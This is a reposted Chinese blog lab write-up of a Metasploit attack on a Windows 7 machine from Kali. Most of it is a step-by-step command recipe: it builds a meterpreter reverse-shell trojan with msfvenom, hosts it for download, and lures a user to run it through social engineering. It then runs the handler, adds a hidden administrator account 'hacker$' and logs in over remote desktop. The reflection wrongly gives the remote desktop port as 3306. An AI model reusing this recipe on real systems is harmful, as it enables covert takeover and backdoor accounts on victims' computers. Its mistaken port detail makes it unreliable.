标签:Metasploit multi 9.20 Windows win7 exploit handler msf5 kail
kail基于Debian的数字取证系统,上面集成很多渗透工具,其前身是BT5 (R3)(BrackTrack)。 其中Metasploit是一个综合利用工具,极大提高攻击者的渗透效率,使用Ruby开发的,使用方便,使用该工具的方式:msfconsole,MSF依赖于Postgresql数据库,在使用MSF之前要开启该数据库。 step1:生成木马,msfvenom msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.128 lport=555 -f exe >/root/桌面/evilshell.exe -p -参数后跟上payload,攻击成功后要做什么事情; lhost 后跟监听的IP lport 后跟监听的端口 -f 后跟要监听的后门类型 step2:将木马文件evishell.exe文件放到/var/www/html文件夹下,开启Apache,在Windows里输入kail的ip,下载到桌面 step3:开启MSF,msfconsole(提前查看postgresql运行状态) =[ metasploit v5.0.46-dev ] + -- --=[ 1921 exploits - 1075 auxiliary - 330 post ] + -- --=[ 556 payloads - 45 encoders - 10 nops ] + -- --=[ 4 evasion Exploits :开发利用,攻击某些服务、平台、系统等用到的工具 Payload:载荷载体,攻击成功后要操作什么 Msf>use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) >show options msf5 exploit(multi/handler) > set lhost 192.168.16.128 msf5 exploit(multi/handler) > set lport 555 msf5 exploit(multi/handler) > exploit step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在kail中就会得到肉鸡的shell(meterpreter) meterpreter>shell ipconfig net user hacker$ 123.c /add net localgroup administrators hacker$ /add step5:在kail中开一个新终端,rdesktop 192.168.16.131 实验反思:使用win7系统实验失败,建议换成win service 2008 r2: win7默认远程桌面(3306)端口是不开的,win7默认的cmd不是管理员权限,没有创建用户的权限,我在win7系统中用管理员打开cmd创建hacker(net user hacker$ 123.c /add),加入到管理员用户组(net localgroup Administrator hacker$ /add),然后在kail里远程连接(rdesktop 192.168.16.131),显示会挤掉win7正在登陆的用户,而win7那边也有提示。。。。。。。标签:Metasploit,multi,9.20,Windows,win7,exploit,handler,msf5,kail 来源: https://www.cnblogs.com/yyhfirstblog/p/11567789.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。